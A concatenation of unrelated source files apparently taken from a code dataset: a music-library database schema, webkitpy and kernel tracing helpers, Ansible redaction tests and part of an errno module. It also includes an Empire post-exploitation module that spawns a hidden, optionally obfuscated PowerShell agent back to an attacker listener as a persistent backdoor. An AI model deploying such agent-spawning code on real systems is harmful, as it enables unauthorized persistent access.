class DeltaFilter(object):
def __init__(self, origField, deltaField):
"""Add a delta field to the data.
"""
self.origField = origField
self.deltaField = deltaField
self.previousValue = None
self.rememberReset = False
def process(self, data):
val = data[self.origField]
if self.previousValue is None or data['_reset']:
self.previousValue = val
self.rememberReset = data['_reset']
return False
# We have a delta
delta = val - self.previousValue
self.previousValue = val
if isinstance(delta, timedelta):
data[self.deltaField] = float(delta.days * 24 * 3600) + \
float(delta.seconds) + float(delta.microseconds) * 1.0e-6
else:
data[self.deltaField] = float(delta)
if self.rememberReset:
data['_reset'] = 1
self.rememberReset = False
return True
def getShortName(self):
return "delta_%s" % self.origField
| agpl-3.0 |
rawdlite/mopidy-bigbeet | mopidy_bigbeet/schema/schema.py | 1 | 18040 | from __future__ import unicode_literals
import logging
import os.path
import sys
from os import listdir
from mopidy_bigbeet import Extension
from mopidy_bigbeet.schema import beet_schema, genre_schema
from peewee import *
from playhouse.apsw_ext import APSWDatabase, DateTimeField
user_version = 1
# database = SqliteDatabase(None, pragmas=(
# ('journal_mode', 'WAL'),
# ('user_version', user_version)
# ))
# database = MySQLDatabase('bigbeet', user='rails_user', passwd='tequila'
# charset='utf8mb4')
logger = logging.getLogger(__name__)
bdb = None
gdb = None
data_dir = None
database = APSWDatabase(None,
pragmas=(
('foreign_keys', 'ON'),
('temp_store', 2),
('journal_mode', 'WAL'),
('user_version', user_version)
))
unwanted = [u'_',u'1',u'2',u'3',u'4',u'5',u'6',u'7',u'8',u'9',u'0',u' ',u'!',u'"',u'.',u'<']
def _initialize(config):
global bdb
global gdb
global data_dir
data_dir = config['bigbeet']['bb_data_dir'] # or: Extension.get_data_dir(config)
if not os.path.exists(data_dir):
os.makedirs(data_dir)
bdb = beet_schema.BeetsLibrary(config['bigbeet']['beetslibrary']).lib
gdb = genre_schema.GenreTree(data_dir)
db_path = os.path.join(data_dir, b'bb_library.db')
_connect_db(db_path)
def setup_db():
#import pdb; pdb.set_trace()
try:
database.drop_tables(
[Genre, AlbumGroup, Album, Artist, Label, SchemaMigration, Track, UserTag, TrackTag])
except:
pass
for modell in [Genre, AlbumGroup, Album, Artist, Label, SchemaMigration, Track, UserTag, TrackTag]:
modell.create_table()
SchemaMigration.create(version = '20180818' )
def _connect_db(db_path):
global database
db_existed = os.path.isfile(db_path)
database.init(db_path)
if not db_existed:
setup_db()
try:
database.connect()
except:
pass
#_migrate_db()
def _migrate_db():
migrations = listdir(os.path.join(
os.path.dirname(__file__), '..', 'db', 'migrations'))
migrations = set((m.split('.')[0] for m in migrations if m.startswith(u'migration')))
versions = [v.version for v in SchemaMigration.select()]
for migration in migrations:
if not migration.split('_')[1] in versions:
modul_name = 'mopidy_bigbeet.db.migrations.' + migration
mig_object = __import__(modul_name,
globals(),
locals(),
[migration],
-1)
mig = mig_object.Migration(database=database)
# import pdb; pdb.set_trace()
mig.migrate_db()
mig.update_db()
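# Migration modules are expected under db/migrations/ and named
# migration_<version>.py (e.g. migration_20180818.py, matching the
# SchemaMigration row seeded by setup_db); each must expose a Migration
# class providing migrate_db() and update_db().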
def check_genres(config):
_initialize(config)
albums = bdb.albums()
for album in albums:
gdb.find_missing(album['genre'])
for item in bdb.items():
gdb.find_missing(item['genre'])
with open(os.path.join(data_dir, 'genres-missing.txt'), 'w') as outfile:
for mg in set(gdb.genres_missing):
print mg
outfile.write(mg + '\n')
print set(gdb.genres_missing)
def _sync_beets_item(track, item):
track.name = item.title
track.path = item.path
track.acoustid_fingerprint = item.acoustid_fingerprint
track.acoustid = item.acoustid_id
track.added = item.added
if item.singleton:
track.album = None
else:
bdb_album = item.get_album()
if bdb_album:
track.album = Album.get(beets_id=item.get_album().id)
track.artist = item.artist
track.asin = item.asin
track.bitdepth = item.bitdepth
track.bitrate = item.bitrate
track.beets_id = item.id
track.bpm = item.bpm
track.channels = item.channels
track.comments = item.comments
track.composer = item.composer
track.country = item.country
track.day = item.day
track.disc = item.disc
track.encoder = item.encoder
track.format = item.format
track.genre = item.genre
track.grouping = item.grouping
track.language = item.language
track.length = item.length
track.mb_releasegroupid = item.mb_releasegroupid
track.mb_trackid = item.mb_trackid
track.media = item.media
track.month = item.month
track.mtime = item.mtime
track.original_day = item.original_day
track.original_month = item.original_month
track.original_year = item.original_year
track.samplerate = item.samplerate
track.track = item.track
track.year = item.year
_sync_usertags(item, track)
track.save()
def _sync_usertags(item, track):
bb_usertags = [i.tag.name for i in track.tracktag_set]
if hasattr(item, 'usertags'):
usertags = item.usertags.split('|')
else:
usertags = []
missing_usertags = [i for i in usertags if i not in bb_usertags]
delete_usertags = [i for i in bb_usertags if i not in usertags]
# import pdb; pdb.set_trace()
if set(bb_usertags) == set(usertags):
# Nothing to sync
return
elif missing_usertags:
for tag_str in missing_usertags:
tag, created = UserTag.get_or_create(name=tag_str)
TrackTag.get_or_create(track=track, tag=tag)
elif delete_usertags:
for tag_str in delete_usertags:
usertag = UserTag.select().where(UserTag.name == tag_str)[0]
usertag.delete_instance(recursive=True)
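# The sync above is a two-way set difference; the same idea in isolation
# (illustrative only, plain sets instead of ORM rows):
#
# beets_tags = set(item.usertags.split('|')) # tags on the beets item
# bb_tags = set(t.tag.name for t in track.tracktag_set) # tags already stored
# to_add = beets_tags - bb_tags # create these TrackTag rows
# to_drop = bb_tags - beets_tags # delete these UserTag rows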
def _sync_beets_album(album, bdb_album):
genre_name = bdb_album.genre or '_Unknown'
genre = _set_genre(genre_name)
try:
artist, created = Artist.get_or_create(
name=(bdb_album.albumartist or '_Unknown'),
mb_albumartistid=bdb_album.mb_albumartistid)
except:
# import pdb; pdb.set_trace()
if bdb_album.mb_albumartistid:
artist, created = Artist.get_or_create(mb_albumartistid=bdb_album.mb_albumartistid)
else:
artist, created = Artist.get_or_create(name=(bdb_album.albumartist or '_Unknown'))
artist.country = bdb_album.country
artist.albumartist_sort = bdb_album.albumartist_sort
artist.albumartist_credit = bdb_album.albumartist_credit
artist.albumartist_initial = _get_artist_initial(artist)
artist.genre = genre
artist.save()
label, created = Label.get_or_create(name = (bdb_album.label or '_Unknown'))
album_group, created = AlbumGroup.get_or_create(
name = (bdb_album.albumtype or '_Unknown'))
album.name = bdb_album.album
album.mb_albumid = bdb_album.mb_albumid or None
album.label = label
album.artist = artist
album.album_group = album_group
album.albumstatus = bdb_album.albumstatus
album.beets_id = bdb_album.id
album.catalognum = bdb_album.catalognum
album.comp = bdb_album.comp
album.day = bdb_album.day
album.disctotal = bdb_album.disctotal
album.genre = genre
album.language = bdb_album.language
album.mb_releasegroupid = bdb_album.mb_releasegroupid
album.month = bdb_album.month
album.original_day = bdb_album.original_day
album.original_month = bdb_album.original_month
album.original_year = bdb_album.original_year
album.tracktotal = len(bdb_album.items())
album.year = bdb_album.year
try:
album.art_url = bdb_album.art_url
except:
logger.debug(u'Album has no art_url field yet: %s', album.name)
try:
album.save()
except:
import pdb;
pdb.set_trace()
def _get_artist_initial(artist):
if artist.albumartist_sort:
return [i for i in artist.albumartist_sort if i not in unwanted][0].upper()
elif artist.name:
return [i for i in artist.name if i not in unwanted][0].upper()
else:
return u'-'
def _set_genre(genre_name):
genres = gdb.find_parents(genre_name)
parent_id = None
while genres:
genre_name = genres.pop()
genre, created = Genre.get_or_create(name=genre_name,
parent=parent_id)
parent_id = genre.id
return genre
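# _set_genre materializes the ancestry chain returned by gdb.find_parents()
# as one Genre row per level, root first. Assuming (hypothetically) that
# find_parents('Death Metal') returns the chain leaf-first with the root
# last, the successive pops create:
#
# Genre(name='Rock', parent=None)
# Genre(name='Metal', parent=<Rock id>)
# Genre(name='Death Metal', parent=<Metal id>) # this one is returned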
def item_update(config,item_id):
_initialize(config)
item = bdb.get_item(item_id)
if item:
track, created = Track.get_or_create(beets_id=item_id)
_sync_beets_item(track, item)
logger.info(u'Track synced')
else:
tracks = Track.select().where(Track.beets_id == item_id)
for track in tracks:
logger.info(u'Track deleted: %s in %s', track.name, str(track.path))
track.delete_instance()
def album_update(config,album_id):
_initialize(config)
bdb_album = bdb.get_album(album_id)
if bdb_album:
# import pdb; pdb.set_trace()
album, created = Album.get_or_create(beets_id=bdb_album.id)
_sync_beets_album(album, bdb_album)
logger.info(u'Album synced: %s', album.name)
else:
albums = Album.select().where(Album.beets_id == album_id)
for album in albums:
artist = album.artist
label = album.label
album_group = album.album_group
for track in album.track_set:
track.delete_instance()
album.delete_instance()
logger.info(u'Album deleted: %s', album.name)
if artist:
genre = artist.genre
if artist and not artist.albums:
artist.delete_instance()
if label and not label.albums:
label.delete_instance()
if album_group and not album_group.albums:
album_group.delete_instance()
if not genre.artists and not Genre.select().where(Genre.parent == genre.id):
genre.delete_instance()
def _delete_orphans():
albums = Album.select()
for album in albums:
if not album.track_set:
album.delete_instance()
artists = Artist.select()
for artist in artists:
if not artist.albums:
artist.delete_instance()
genres = Genre.select()
for genre in genres:
if not genre.artists:
genre.delete_instance()
labels = Label.select()
for label in labels:
if not label.albums:
label.delete_instance()
album_groups = AlbumGroup.select()
for album_group in album_groups:
if not album_group.albums:
album_group.delete_instance()
def update(config):
_initialize(config)
# import pdb; pdb.set_trace()
_delete_orphans()
for item in bdb.items(u'singleton:true'):
logger.info("update: %s", item.path)
track, created = Track.get_or_create(beets_id=item.id)
_sync_beets_item(track, item)
def _fix_mtime(config):
_initialize(config)
items = bdb.items()
with open(os.path.join(data_dir, 'files-missing.txt'), 'w') as outfile:
for item in items:
if os.path.isfile(item.path):
item.mtime = item.current_mtime()
item.store()
else:
print(u"missing %s", item.path)
# import pdb; pdb.set_trace()
item.remove(False,True)
tracks = Track.select().where(Track.path == item.path)
for track in tracks:
album = track.album
artist = album.artist
genre = artist.genre
track.delete_instance()
if not album.track_set:
album.delete_instance()
if not artist.albums:
artist.delete_instance()
if not genre.artists:
genre.delete_instance()
outfile.write(item.path + '\n')
def scan(config):
_initialize(config)
# import pdb; pdb.set_trace()
from beets import dbcore
id_sort = dbcore.query.FixedFieldSort(u"id", True)
for bdb_album in bdb.albums(sort = id_sort):
try:
print("%s - %s" % (bdb_album.id, bdb_album.album.encode('utf-8')))
except:
pass
#import pdb; pdb.set_trace()
album, created = Album.get_or_create(beets_id=bdb_album.id)
_sync_beets_album(album, bdb_album)
for item in bdb_album.items():
track, created = Track.get_or_create(beets_id=item.id)
_sync_beets_item(track, item)
for item in bdb.items(u'singleton:true'):
track, created = Track.get_or_create(beets_id=item.id)
_sync_beets_item(track, item)
_delete_orphans()
def _find_children(genre, children):
logger.info("called with {0}".format(genre.name))
childs = [c for c in Genre.select().where(Genre.parent == genre.id)]
children += childs
for child in childs:
_find_children(child, children)
return children
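# _find_children collects the entire subtree below a genre into the shared
# `children` list (the starting genre itself is excluded). Sketch, assuming
# some genre rows exist:
#
# rock = Genre.get(Genre.name == u'Rock')
# subtree = _find_children(rock, [])
# names = [g.name for g in subtree] # e.g. [u'Punk', u'Metal', u'Death Metal']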
class BaseModel(Model):
created_at = DateTimeField(null=True)
updated_at = DateTimeField(null=True)
class Meta:
database = database
class AlbumGroup(BaseModel):
name = CharField(null=True) # varchar
class Meta:
db_table = 'album_groups'
class Genre(BaseModel):
name = CharField(null=True, unique=True) # varchar
parent = IntegerField(null=True)
class Meta:
db_table = 'genres'
class Label(BaseModel):
name = CharField(null=True) # varchar
class Meta:
db_table = 'labels'
class Artist(BaseModel):
albumartist_credit = TextField(null=True)
albumartist_sort = CharField(null=True) # varchar
country = CharField(null=True) # varchar
genre = ForeignKeyField(Genre, related_name='artists', db_column='genre_id', null=True)
mb_albumartistid = CharField(null=True, unique=True) # varchar
name = CharField(null=True, unique=True) # varchar
albumartist_initial = CharField(null=True) # varchar
class Meta:
db_table = 'artists'
class Album(BaseModel):
added = FloatField(null=True) # float
album_group = ForeignKeyField(AlbumGroup, related_name='albums', db_column='album_group_id', null=True)
albumstatus = CharField(null=True) # varchar
artist = ForeignKeyField(Artist, related_name='albums', db_column='artist_id', null=True)
beets_id = IntegerField(null=True, unique=True)
catalognum = CharField(null=True) # varchar
art_url = CharField(null=True) # varchar
comp = IntegerField(null=True)
day = IntegerField(null=True)
disctotal = IntegerField(null=True)
genre = ForeignKeyField(Genre, related_name='albums', db_column='genre_id', null=True)
label = ForeignKeyField(Label, related_name='albums', db_column='label_id', null=True)
language = CharField(null=True) # varchar
mb_albumid = CharField(null=True, unique=True) # varchar
# mb_albumartistid
mb_releasegroupid = CharField(null=True) # varchar
month = IntegerField(null=True)
name = CharField(null=True) # varchar
tracktotal = IntegerField(null=True)
original_day = IntegerField(null=True)
original_month = IntegerField(null=True)
original_year = IntegerField(null=True)
year = IntegerField(null=True)
class Meta:
db_table = 'albums'
# class SecondaryGenre(BaseModel):
# name = CharField(null=True) # varchar
# class Meta:
# db_table = 'secondary_genres'
# class ArtistSecondaryGenre(BaseModel):
# artist = ForeignKeyField(Artist, db_column='artist_id', null=True)
# position = IntegerField(null=True)
# secondary_genre = ForeignKeyField(SecondaryGenre, db_column='secondary_genre_id', null=True)
# class Meta:
# db_table = 'artist_secondary_genres'
class SchemaMigration(BaseModel):
version = CharField(primary_key=True) # varchar
class Meta:
db_table = 'schema_migrations'
class UserTag(BaseModel):
name = CharField(unique=True) # varchar
class Meta:
db_table = 'user_tags'
class Track(BaseModel):
acoustid_fingerprint = CharField(null=True) # varchar
acoustid = CharField(db_column='acoustid_id', null=True) # varchar
added = FloatField(null=True) # float
album = ForeignKeyField(Album, db_column='album_id', null=True)
artist = CharField(null=True) # varchar
asin = CharField(null=True) # varchar
bitdepth = IntegerField(null=True)
bitrate = IntegerField(null=True)
beets_id = IntegerField(null=True)
bpm = IntegerField(null=True)
channels = IntegerField(null=True)
comments = CharField(null=True) # varchar
composer = CharField(null=True) # varchar
country = CharField(null=True) # varchar
day = IntegerField(null=True)
disc = IntegerField(null=True)
encoder = CharField(null=True) # varchar
format = CharField(null=True) # varchar
genre = CharField(null=True) # varchar
grouping = CharField(null=True) # varchar
language = CharField(null=True) # varchar
length = FloatField(null=True) # float
# mb_artistid = CharField(null=True)
# mb_albumartistid = CharField(null=True)
mb_releasegroupid = CharField(null=True) # varchar
mb_trackid = CharField(null=True) # varchar
media = CharField(null=True) # varchar
month = IntegerField(null=True)
mtime = FloatField(null=True) # float
name = CharField(null=True) # varchar
original_day = IntegerField(null=True)
original_month = IntegerField(null=True)
original_year = IntegerField(null=True)
path = BlobField(null=True)
samplerate = IntegerField(null=True)
track = IntegerField(null=True)
year = IntegerField(null=True)
class Meta:
db_table = 'tracks'
class TrackTag(BaseModel):
track = ForeignKeyField(Track, db_column='track_id', null=False)
tag = ForeignKeyField(UserTag, db_column='user_tag_id', null=False)
class Meta:
indexes = (
(('tag', 'track'), True),
)
db_table = 'track_tags'
| apache-2.0 |
adaptivethreat/Empire | lib/modules/powershell/management/spawn.py | 10 | 3899 | from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Spawn',
'Author': ['@harmj0y'],
'Description': ('Spawns a new agent in a new powershell.exe process.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : True,
'Value' : ''
},
'SysWow64' : {
'Description' : 'Switch. Spawn a SysWow64 (32-bit) powershell.exe.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# extract all of our options
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
sysWow64 = self.options['SysWow64']['Value']
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
# transform the backdoor into something launched by powershell.exe
# so it survives the agent exiting
if sysWow64.lower() == "true":
stagerCode = "$Env:SystemRoot\\SysWow64\\WindowsPowershell\\v1.0\\" + launcher
else:
stagerCode = "$Env:SystemRoot\\System32\\WindowsPowershell\\v1.0\\" + launcher
parts = stagerCode.split(" ")
code = "Start-Process -NoNewWindow -FilePath \"%s\" -ArgumentList '%s'; 'Agent spawned to %s'" % (parts[0], " ".join(parts[1:]), listenerName)
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, psScript=code, obfuscationCommand=obfuscationCommand)
return code
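# --- Illustrative usage sketch (editor addition, not part of Empire) ---
# Driving the module outside Empire's menu, using the [Name, Value] parameter
# format consumed in __init__. The stubs below stand in for Empire's real
# mainMenu object and are purely hypothetical.
if __name__ == '__main__':
    class _StubStagers(object):
        def generate_launcher(self, listenerName, **kwargs):
            return 'powershell -NoP -enc AAAA'  # placeholder launcher string

    class _StubMainMenu(object):
        stagers = _StubStagers()
        installPath = '.'

    mod = Module(_StubMainMenu(), params=[['Listener', 'http'], ['SysWow64', 'True']])
    print mod.generate()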
| bsd-3-clause |
mattvick/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/net/web.py | 194 | 1811 | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import urllib2
from webkitpy.common.net.networktransaction import NetworkTransaction
class Web(object):
def get_binary(self, url, convert_404_to_None=False):
return NetworkTransaction(convert_404_to_None=convert_404_to_None).run(lambda: urllib2.urlopen(url).read())
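# --- Illustrative usage sketch (editor addition, not upstream webkitpy) ---
# Fetching a build artifact while tolerating a missing URL; the URL below is
# hypothetical.
def _fetch_results_or_none(url='https://build.webkit.org/results.zip'):
    return Web().get_binary(url, convert_404_to_None=True)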
| bsd-3-clause |
cj360/android_kernel_lge_g3 | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulting trace is processed into a tree to produce a more human
view of the call stack by drawing a textual but hierarchical tree of
calls. Only the functions' names and the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some time, but not too much; the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
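# --- Illustrative example (editor addition) ---
# A sample function-tracer line of the shape parseLine() expects; the task
# name, CPU field and timestamp are made up for demonstration.
def _parseLine_example():
    sample = ' bash-1234 [000] 6153.1234: do_sys_open <-sys_open'
    return parseLine(sample)  # -> ('6153.1234', 'do_sys_open', 'sys_open')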
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 |
detiber/ansible | test/units/module_utils/basic/test_exit_json.py | 66 | 7332 | # -*- coding: utf-8 -*-
# (c) 2015, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
import copy
import json
import sys
from ansible.compat.tests import unittest
from units.mock.procenv import swap_stdin_and_argv, swap_stdout
from ansible.module_utils import basic
empty_invocation = {u'module_args': {}}
class TestAnsibleModuleExitJson(unittest.TestCase):
def setUp(self):
args = json.dumps(dict(ANSIBLE_MODULE_ARGS={}))
self.stdin_swap_ctx = swap_stdin_and_argv(stdin_data=args)
self.stdin_swap_ctx.__enter__()
# since we can't use context managers and "with" without overriding run(), call them directly
self.stdout_swap_ctx = swap_stdout()
self.fake_stream = self.stdout_swap_ctx.__enter__()
basic._ANSIBLE_ARGS = None
self.module = basic.AnsibleModule(argument_spec=dict())
def tearDown(self):
# since we can't use context managers and "with" without overriding run(), call them directly to clean up
self.stdin_swap_ctx.__exit__(None, None, None)
self.stdout_swap_ctx.__exit__(None, None, None)
def test_exit_json_no_args_exits(self):
with self.assertRaises(SystemExit) as ctx:
self.module.exit_json()
if isinstance(ctx.exception, int):
# Python2.6... why does sys.exit behave this way?
self.assertEquals(ctx.exception, 0)
else:
self.assertEquals(ctx.exception.code, 0)
return_val = json.loads(self.fake_stream.getvalue())
self.assertEquals(return_val, dict(changed=False, invocation=empty_invocation))
def test_exit_json_args_exits(self):
with self.assertRaises(SystemExit) as ctx:
self.module.exit_json(msg='message')
if isinstance(ctx.exception, int):
# Python2.6... why does sys.exit behave this way?
self.assertEquals(ctx.exception, 0)
else:
self.assertEquals(ctx.exception.code, 0)
return_val = json.loads(self.fake_stream.getvalue())
self.assertEquals(return_val, dict(msg="message", changed=False, invocation=empty_invocation))
def test_fail_json_exits(self):
with self.assertRaises(SystemExit) as ctx:
self.module.fail_json(msg='message')
if isinstance(ctx.exception, int):
# Python2.6... why does sys.exit behave this way?
self.assertEquals(ctx.exception, 1)
else:
self.assertEquals(ctx.exception.code, 1)
return_val = json.loads(self.fake_stream.getvalue())
self.assertEquals(return_val, dict(msg="message", failed=True, invocation=empty_invocation))
def test_exit_json_proper_changed(self):
with self.assertRaises(SystemExit) as ctx:
self.module.exit_json(changed=True, msg='success')
return_val = json.loads(self.fake_stream.getvalue())
self.assertEquals(return_val, dict(changed=True, msg='success', invocation=empty_invocation))
class TestAnsibleModuleExitValuesRemoved(unittest.TestCase):
OMIT = 'VALUE_SPECIFIED_IN_NO_LOG_PARAMETER'
dataset = (
(dict(username='person', password='$ecret k3y'),
dict(one=1, pwd='$ecret k3y', url='https://username:password12345@foo.com/login/',
not_secret='following the leader', msg='here'),
dict(one=1, pwd=OMIT, url='https://username:password12345@foo.com/login/',
not_secret='following the leader', changed=False, msg='here',
invocation=dict(module_args=dict(password=OMIT, token=None, username='person'))),
),
(dict(username='person', password='password12345'),
dict(one=1, pwd='$ecret k3y', url='https://username:password12345@foo.com/login/',
not_secret='following the leader', msg='here'),
dict(one=1, pwd='$ecret k3y', url='https://username:********@foo.com/login/',
not_secret='following the leader', changed=False, msg='here',
invocation=dict(module_args=dict(password=OMIT, token=None, username='person'))),
),
(dict(username='person', password='$ecret k3y'),
dict(one=1, pwd='$ecret k3y', url='https://username:$ecret k3y@foo.com/login/',
not_secret='following the leader', msg='here'),
dict(one=1, pwd=OMIT, url='https://username:********@foo.com/login/',
not_secret='following the leader', changed=False, msg='here',
invocation=dict(module_args=dict(password=OMIT, token=None, username='person'))),
),
)
def test_exit_json_removes_values(self):
self.maxDiff = None
for args, return_val, expected in self.dataset:
params = dict(ANSIBLE_MODULE_ARGS=args)
params = json.dumps(params)
with swap_stdin_and_argv(stdin_data=params):
with swap_stdout():
basic._ANSIBLE_ARGS = None
module = basic.AnsibleModule(
argument_spec = dict(
username=dict(),
password=dict(no_log=True),
token=dict(no_log=True),
),
)
with self.assertRaises(SystemExit) as ctx:
self.assertEquals(module.exit_json(**return_val), expected)
self.assertEquals(json.loads(sys.stdout.getvalue()), expected)
def test_fail_json_removes_values(self):
self.maxDiff = None
for args, return_val, expected in self.dataset:
expected = copy.deepcopy(expected)
del expected['changed']
expected['failed'] = True
params = dict(ANSIBLE_MODULE_ARGS=args)
params = json.dumps(params)
with swap_stdin_and_argv(stdin_data=params):
with swap_stdout():
basic._ANSIBLE_ARGS = None
module = basic.AnsibleModule(
argument_spec = dict(
username=dict(),
password=dict(no_log=True),
token=dict(no_log=True),
),
)
with self.assertRaises(SystemExit) as ctx:
self.assertEquals(module.fail_json(**return_val), expected)
self.assertEquals(json.loads(sys.stdout.getvalue()), expected)
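# --- Illustrative sketch (editor addition, not part of the Ansible test suite) ---
# The dataset above exercises AnsibleModule's no_log handling: values of
# no_log parameters are replaced in module output with the OMIT placeholder,
# and secrets embedded inside other strings (e.g. URLs) are masked. A loose,
# standalone approximation of the substring masking only:
def _mask_secrets(text, secrets, placeholder='********'):
    for secret in secrets:
        text = text.replace(secret, placeholder)
    return text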
| gpl-3.0 |
40223119/-2015cd_midterm | static/Brython3.1.1-20150328-091302/Lib/errno.py | 624 | 4096 | """
This module makes available standard errno system symbols.
The value of each symbol is the corresponding integer value,
e.g., on most systems, errno.ENOENT equals the integer 2.
The dictionary errno.errorcode maps numeric codes to symbol names,
e.g., errno.errorcode[2] could be the string 'ENOENT'.
Symbols that are not relevant to the underlying system are not defined.
To map error codes to error messages, use the function os.strerror(),
e.g. os.strerror(2) could return 'No such file or directory'.
"""
errorcode= {1: 'EPERM', 2: 'ENOENT', 3: 'ESRCH', 4: 'EINTR', 5: 'EIO',
6: 'ENXIO', 7: 'E2BIG', 8: 'ENOEXEC', 9: 'EBADF', 10: 'ECHILD', 11: 'EAGAIN',
12: 'ENOMEM', 13: 'EACCES', 14: 'EFAULT', 15: 'ENOTBLK', 16: 'EBUSY',
17: 'EEXIST', 18: 'EXDEV', 19: 'ENODEV', 20: 'ENOTDIR', 21: 'EISDIR',
22: 'EINVAL', 23: 'ENFILE', 24: 'EMFILE', 25: 'ENOTTY', 26: 'ETXTBSY',
27: 'EFBIG', 28: 'ENOSPC', 29: 'ESPIPE', 30: 'EROFS', 31: 'EMLINK',
